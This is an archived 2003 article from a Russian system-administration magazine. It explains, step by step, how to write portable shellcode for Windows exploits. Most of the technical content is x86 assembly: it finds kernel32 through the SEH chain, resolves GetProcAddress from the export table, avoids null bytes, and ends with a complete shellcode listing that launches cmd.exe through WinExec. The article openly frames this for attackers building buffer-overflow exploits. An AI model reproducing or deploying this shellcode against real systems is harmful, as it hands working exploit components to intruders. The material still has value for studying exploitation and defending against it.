Поиск

www.samag.ru

Web

0 товаров , сумма 0 руб.

	Журнал "Системный администратор"
	Журнал «БИТ»
	Подписка
	Архив номеров
	Где купить
	Наука и технологии
	Авторам
	Рекламодателям
	Контакты

Опросы

Статьи

Событие

В банке рассола ждет сисадмина с полей фрактал-кукумбер

Читайте впечатления о слете ДСА 2024, рассказанные волонтером и участником слета

Организация бесперебойной работы

Бесперебойная работа ИТ-инфраструктуры в режиме 24/7 Как обеспечить ее в нынешних условиях?

Год назад ИТ-компания «Крок» провела исследование «Ключевые тренды сервисного рынка 2023». Результаты

Книжная полка

Читайте и познавайте мир технологий!

Издательство «БХВ» продолжает радовать выпуском интересных и полезных, к тому же прекрасно

СУБД PostgreSQL

СУБД Postgres Pro

Сертификация по новым требованиям ФСТЭК и роль администратора без доступа к данным

Критическая инфраструктура

КИИ для оператора связи. Готовы ли компании к повышению уровня кибербезопасности?

Похоже, что провайдеры и операторы связи начали забывать о требованиях законодательства

Архитектура ПО

Архитектурные метрики. Качество архитектуры и способность системы к эволюционированию

Обычно соответствие программного продукта требованиям мы проверяем через скоуп вполне себе понятных

Как хорошо вы это знаете

Что вам известно о разработках компании ARinteg?

Компания ARinteg (ООО «АРинтег») – системный интегратор на российском рынке ИБ –

Графические редакторы

Рисование абстрактных гор в стиле Paper Cut

Векторный графический редактор Inkscape – яркий представитель той прослойки open source, с

День сисадмина

Учите матчасть! Или как стать системным администратором

Лето – время не только отпусков, но и хорошая возможность определиться с профессией

День сисадмина

Живой айтишник – это всегда движение. Остановка смерти подобна

Наши авторы рассказывают о своем опыте и дают советы начинающим системным администраторам.

Виртуализация

Рынок решений для виртуализации

По данным «Обзора российского рынка инфраструктурного ПО и перспектив его развития», сделанного

Книжная полка

Как стать креативным и востребованным

Издательский дом «Питер» предлагает новинки компьютерной литературы, а также книги по бизнесу

Книжная полка

От создания сайтов до разработки и реализации API

В издательстве «БХВ» недавно вышли книги, которые будут интересны системным администраторам, создателям

Разбор полетов

Ошибок опыт трудный

Как часто мы легко повторяем, что не надо бояться совершать ошибки, мол,

1001 и 1 книга

19.03.2018г.

Комментарии: 0

Машинное обучение с использованием библиотеки Н2О

12.03.2018г.

Комментарии: 0

Особенности киберпреступлений в России: инструменты нападения и защита информации

12.03.2018г.

Комментарии: 0

Глубокое обучение с точки зрения практика

12.03.2018г.

Комментарии: 0

Изучаем pandas

12.03.2018г.

Комментарии: 0

Программирование на языке Rust (Цветное издание)

19.12.2017г.

Комментарии: 0

Глубокое обучение

19.12.2017г.

Комментарии: 0

Анализ социальных медиа на Python

19.12.2017г.

Комментарии: 0

Основы блокчейна

19.12.2017г.

Комментарии: 0

Java 9. Полный обзор нововведений

16.02.2017г.

Комментарии: 0

Опоздавших не бывает, или книга о стеке

17.05.2016г.

Комментарии: 0

Теория вычислений для программистов

30.03.2015г.

Комментарии: 0

От математики к обобщенному программированию

18.02.2014г.

Комментарии: 0

Рецензия на книгу «Читаем Тьюринга»

13.02.2014г.

Комментарии: 0

Читайте, размышляйте, действуйте

12.02.2014г.

Комментарии: 0

Рисуем наши мысли

10.02.2014г.

Комментарии: 3

Страна в цифрах

18.12.2013г.

Комментарии: 0

Большие данные меняют нашу жизнь

18.12.2013г.

Комментарии: 0

Компьютерные технологии – корень зла для точки роста

04.12.2013г.

Комментарии: 0

Паутина в облаках

03.12.2013г.

Комментарии: 0

Рецензия на книгу «MongoDB в действии»

02.12.2013г.

Комментарии: 0

Не думай о минутах свысока

Друзья сайта

Построение переносимого shell-кода для Windows-систем

Архив номеров / 2003 / Выпуск №9 (10) / Построение переносимого shell-кода для Windows-систем

Рубрика: Безопасность / Тестирование

СТАНИСЛАВ ГОШКО

Построение переносимого shell-кода

для Windows-систем

Всё чаще и чаще обсуждаются аспекты атак на Windows-системы. Основные возможности атак на семейство данных систем были уже рассмотрены, но не стоит забывать о том, что при построении атаки на переполнение буфера в большинстве случаев атакующий сталкивается с построением shell-кода.

Shell-код – это двоичный код, который выполняется в контексте другой программы. Когда уязвимость уже обнаружена и начинается написание эксплоита, необходимо для себя решить, будет ли эксплоит зависеть только от версии уязвимой программы или ещё он будет зависеть от версии операционной системы. Если атакующий хочет, чтобы его эксплоит работал на большинстве систем, то ему необходимо построить shell-код, который бы не опирался на «жёсткие» адреса WIN API-функций.

Для построения такого рода кода необходимо, чтобы shell-код удовлетворял следующим требованиям:

Поиск адреса ядра (kernel32.dll).
Поиск адреса WIN API-функции GetProcAddress.
Поиск адресов других WIN API-функций при помощи функции GetProcAddress.
Запуск необходимых нам WIN API-функций по найденным адресам.

Каким образом возможно выполнить первое требование? При запуске любой программы в операционных системах семейства Windows она вызывается из ядра. Поэтому первый и относительно сложный способ поиска адреса ядра основан на поиске в стеке. Но если мы воспользуемся этим способом, то наш shell-код станет очень большим, поэтому мы пойдём другим путём.

Второй способ обнаружения адреса ядра – при помощи SEH. Что же такое SEH? Это структурированный обработчик исключений. К примеру, если мы пытаемся писать в ядро, то будет вызываться исключение и обрабатываться оно будет при помощи SEH. Адрес обработчика исключений всегда лежит внутри ядра, так что для поиска адреса ядра нам всего лишь необходимо найти последний обработчик. По адресу fs:[0] лежит номер текущего обработчика исключений. Ищем, пока не найдём 0xFFFFFFFF (номер системного обработчика). Этот адрес, в отличие от адреса функции ExitThread в NT, всегда лежит в kernel32.dll.

Рассмотрим пример поиска адреса kernel:

mov eax, fs:[ebx] ; Указатель на список обработчиков

inc eax ; Увеличиваем eax на 1

next_seh:

xchg eax, ebx ; Обмениваем содержимое eax c ebx

mov eax, [ebx-1] ; Номер текущего обработчика

inc eax ; Увеличиваем eax на 1

jnz next_seh ; Является ли он системным (-1)?

mov edx, [ebx-1+4] ; Адрес обработчика

xchg ax, dx ; Эквивалентно xor dx,dx (eax=0)

xor eax,eax ; Обнуляем eax

mov ax,1001h ; Помещаем в eax

dec ax ; 1000

next_block:

cmp word ptr [edx],'ZM' ; Начало?

je found_MZ ; ДА!

sub edx,eax ; Ищем дальше

jmp next_block

found_MZ:

mov ebx,edx ; Сохраним указатель

mov edi,dword ptr [edx+3Ch] ; Адрес PE-заголовка

add edi,edx ; +Адрес kernel

cmp word ptr [edi],'EP' ; Проверка на PE

jne Exit ; Не равно – выходим

В результате работы данного куска кода у нас в регистре edx будет находиться адрес ядра. Данный код специально модифицирован таким образом, чтобы в нём не было нулевых байт.

Теперь перейдём к поиску адреса функции GetProcAddress. Поиск данной функции используется в большинстве современных вирусов, ориентированных на Windows-системы.

По определённому смещению в PE-заголовке мы можем найти адрес таблицы экспортов. В таблице экспортов узнаем количество указателей на функции, расположение таблицы указателей имен и адрес таблицы ординалов. Перебираем указатели (и ординалы), проверяя при этом имена функций, на которые они указывают при совпадении с GetProcAddress. При совпадении возьмем ординал и по таблице адресов мы получим адрес функции.

Рассмотрим пример поиска адреса функции GetProc-Address:

mov ebx,edx ; Сохраним указатель

mov edi,dword ptr [edx+3Ch] ; Адрес PE-заголовка

add edi,edx ; +Адрес kernel

cmp word ptr [edi],'EP' ; Проверка на PE

jne Exit ; Не равно – выходим

push edx ; Сохраним адрес kernel

add ebx,[edi+78h] ; Получим адрес таблицы экспортов

mov ecx,[ebx+18h] ; Количество указателей

mov esi,[ebx+20h] ; Указатель на таблицу указателей имен

mov edi,[ebx+24h] ; Указатель на таблицу ординалов

add esi,edx ; Адрес таблицы имен в памяти

add edi,edx ; Адрес таблицы ординалов в памяти

cld ; Поиск вперед

add ebp,8 ; ebp указывает на следующую строку

Search: ; Ищем функцию GetProcAddress

Lodsd ; Берем указатель из таблицы указателей

add eax,edx ; Получаем адрес памяти

xchg esi,eax ; В esi указатель на имя найденной функции

xchg edi,ebp ;

; Указываем на имя нужной нам функции

push ecx ; Кладём ecx в стек

xor ecx,ecx ; Обнуляем ecx

add cl,15 ; Размер строки

repe cmpsb ; Сравниваем

jc restore1

rest2:

xchg esi,eax ; Восстановим значение esi

pop ecx ; Восстановим количество указателей

xchg edi,ebp ; Восстановим указатель на ординалы

je Found ; Нашли!

inc edi ; Нет – пробуем следующую функцию

inc edi ; Указатель на следующий ординал

loop Search

jmp Exit

restore1:

xor esi,esi ;

mov si,61125 ; Помещаем в esi число 15

sub si,61110 ;

sub esi,ecx ; Восстанавливаем указатель (edi) на начало строки

sub edi,esi ;

jmp rest2 ;

Found:

xor eax,eax ; Обнуляем eax

mov ax,word ptr [edi]

;

; Возьмем ординал

shl eax,2 ; Умножим на размер ординала

mov esi,[ebx+1Ch] ; Указатель на таблицу адресов

add esi,edx ; Получим адрес начала таблицы адресов

add esi,eax ; И адрес нужной функции

lodsd ; Прочитаем

add eax,edx ; Добавим адрес kernel

В начале этого кода в edx хранится адрес kernel, а в конце в eax хранится адрес функции GetProcAddress.

Третье и четвёртое требования выполняются достаточно легко. Для этого необходимо знание о том, с какими параметрами запускаются необходимые нам WIN API-функции.

Теперь построим переносимый shell-код для локальной атаки на Win32-системы:

.386

.model flat, stdcall

extrn ExitProcess:proc

.data

start:

;---------------[SUPA SHELLCODE]--------------------------

Getproc:

mov esi,esp ; esi указывает на вершину стека

xor ecx,ecx ; обнуляем ecx

mov cl,169 ; ecx указывает на текстовую строку 'WinExec'

add esi,ecx ; И esi теперь указывет на 'WinExec'

push esi ; Кладём esi в стек

mov ebp,esi ; И ebp теперь указывает на 'WinExec'

mov edi,esi ; И edi теперь указывает на 'WinExec'

xor ecx,ecx ; Обнуляем ecx

mov cl,27 ; И кладём в cl 27

xor1: lodsb ; Загружаем в al байт

cmp al,01 ; Проверяем 1 это или нет

jne nextb ; Если нет – ищем дальше

xor al,01 ; Если 1, то обнуляем его и

nextb:

stosb ; Возвращаем на место

loop xor1 ; Таким образом, мы восстанавливаем все нужные нам нули

xor ebx,ebx ; Обнуляем ebx

mov eax, fs:[ebx] ; Указатель на список обработчиков

inc eax ; Увеличиваем eax на 1

next_seh:

xchg eax, ebx ; Обмениваем содержимое eax c ebx

mov eax, [ebx-1] ; Номер текущего обработчика

inc eax ; Увеличиваем eax на 1

jnz next_seh ; Является ли он системным (-1)?

mov edx, [ebx-1+4] ; Адрес обработчика

xchg ax, dx ; Эквивалентно xor dx,dx (eax=0)

xor eax,eax ; Обнуляем eax

mov ax,1001h ; Помещаем в eax

dec ax ; 1000

next_block:

cmp word ptr [edx],'ZM' ; Начало?

je found_MZ ; ДА!

sub edx,eax ; Ищем дальше

jmp next_block

found_MZ:

mov ebx,edx ; Сохраним указатель

mov edi,dword ptr [edx+3Ch] ; Адрес PE-заголовка

add edi,edx ; +Адрес kernel

cmp word ptr [edi],'EP' ; Проверка на PE

jne Exit ; Не равно – выходим

push edx ; Сохраним адрес kernel

add ebx,[edi+78h] ; Получим адрес таблицы экспортов

mov ecx,[ebx+18h] ; Количество указателей

mov esi,[ebx+20h] ; Указатель на таблицу указателей имен

mov edi,[ebx+24h] ; Указатель на таблицу ординалов

add esi,edx ; Адрес таблицы имен в памяти

add edi,edx ; Адрес таблицы ординалов в памяти

cld ; Поиск вперед

add ebp,8 ; ebp указывает на следующую строку

Search: ; Ищем функцию GetProcAddress

lodsd ; Берем указатель из таблицы указателей

add eax,edx ; Получаем адрес памяти

xchg esi,eax ; В esi указатель на имя найденной функции

xchg edi,ebp ;

; Указываем на имя нужной нам фунции

push ecx ; Кладём ecx в стек

xor ecx,ecx ; Обнуляем ecx

add cl,15 ; Размер строки

repe cmpsb ; Сравниваем

jc restore1

rest2:

xchg esi,eax ; Восстановим значение esi

pop ecx ; Восстановим количество указателей

xchg edi,ebp ; Восстановим указатель на ординалы

je Found ; Нашли!

inc edi ; Нет – пробуем следующую функцию

inc edi ; Указатель на следующий ординал

loop Search

jmp Exit

restore1:

xor esi,esi ;

mov si,61125 ; Помещаем в esi число 15

sub si,61110 ;

sub esi,ecx ; Восстанавливаем указатель (edi) на начало строки

sub edi,esi ;

jmp rest2 ;

Found:

xor eax,eax ; Обнуляем eax

mov ax,word ptr [edi]

;

; Возьмем ординал

shl eax,2 ; Умножим на размер ординала

mov esi,[ebx+1Ch] ; Указатель на таблицу адресов

add esi,edx ; Получим адрес начала таблицы адресов

add esi,eax ; И адрес нужной функции

lodsd ; Прочитаем

add eax,edx ; Добавим адрес kernel

call eax ; Получаем адрес функции WinExec

push 1 ; Заполняем стек

push ebp ;

call eax ; Запускаем "cmd.exe"

Exit:

;---------------------------------------------------------

db 'WinExec',01

db 'GetProcAddress',01

db 'cmd',01

konec:

.code

;---------------------------------------------------------

nop

;---------------------------------------------------------

end start

end

Вот мы и построили переносимый shell-код для 32-битных систем семейства Windows.

Комментарии отсутствуют

Добавить комментарий

Комментарии могут оставлять только зарегистрированные пользователи

Tel.: (499) 277-12-45
E-mail: sa@samag.ru